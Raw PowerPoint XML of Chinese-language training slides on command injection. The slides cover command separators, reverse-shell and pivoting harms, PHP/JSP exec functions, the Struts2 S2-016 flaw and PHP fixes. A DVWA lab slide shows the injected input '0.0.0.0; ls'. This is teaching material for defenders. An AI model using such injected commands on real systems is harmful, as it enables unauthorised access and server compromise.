            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令注入漏洞对系统安全产生的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>危害</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掌握</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>脚本语言中可以执行系统命令的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第三方组件存在的代码执行漏洞，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>struts2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掌握</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令注入漏洞的修复</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9154121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命令行注入漏洞</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过浏览器提交执行命令，由于服务器端没有针对执行函数做过滤，导致在没有指定绝对路径的情况下就执行命令，可能会允许攻击者通过改变 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>$PATH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或程序执行环境的其他方面来执行一个恶意构造的代码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在操作系统中，“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>||”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>都可以作为命令连接符使用，用户通过浏览器提交执行命令，由于服务器端没有针对执行函数做过滤，导致在没有指定绝对路径的情况下就执行命令</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7017488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命令注入漏洞对系统安全产生的危害</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>继承</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务程序的权限去执行系统命令或读 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服务的用户权限等于黑客利用漏洞后执行命令的权限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过特定方式进行反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>整个网站甚至控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服务器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>根据权限，可能服务器整体被沦陷</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>进一步</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>渗透</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>把当前控制的机器当作跳板来控制其它内网机器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18371362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各种语言执行系统命令的函数</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输出并返回最后一行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结果。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不输出结果，返回最后一行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结果，所有结果可以保存到一个返回的数组里面。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>passthru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>只调用命令，把命令的运行结果原样地直接输出到标准输出设备上。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Runtime.getRuntime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>exec(&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>commandstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&gt;)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12997780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命令注入漏洞例子</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://mydvwa.com/dvwa/vulnerabilities/exec/</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>正常参数：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0.0.0.0(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>或其它</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>修改后的参数：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0.0.0.0; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>会输出当前目录的列表</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5703103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第三方组件存在的代码执行漏洞</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Struts2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>s2-16)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Struts2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DefaultActionMapper</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>支持一种方法，可以使用”</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>action:”, “redirect:” , “</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>redirectAction</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>:”</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对输入信息进行处理，从而改变前缀参数，这样操作的目的是方便表单中的操作。在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2.3.15.1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>版本以前的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>struts2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中，没有对”</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>action:”, “redirect:” , “</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>redirectAction</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>:”</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等进行处理，导致</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ongl</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表达式可以被执行</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>详细信息请查找 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>s2-16</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1688891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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入原理</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1394239" y="981075"/>
            <a:ext cx="9403522" cy="5145088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13616627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命令注入漏洞的修复方法</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>尽量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不要执行外部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>命令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>尽量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用脚本解决工作，少用执行命令函数，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中禁止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>disable_functions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用自定义函数或函数库来替代外部命令的功能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序参数的情况，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>escapshellcmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序参数值的情况，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>escapeshellarg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参数值尽量使用引用号包裹，并在拼接前调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>转义</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>safe_mode_exec_dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指定可执行文件的路径</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1807253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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入漏洞的方法</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>右边是一个登陆页面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>点击</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>“submit”</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>之后，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
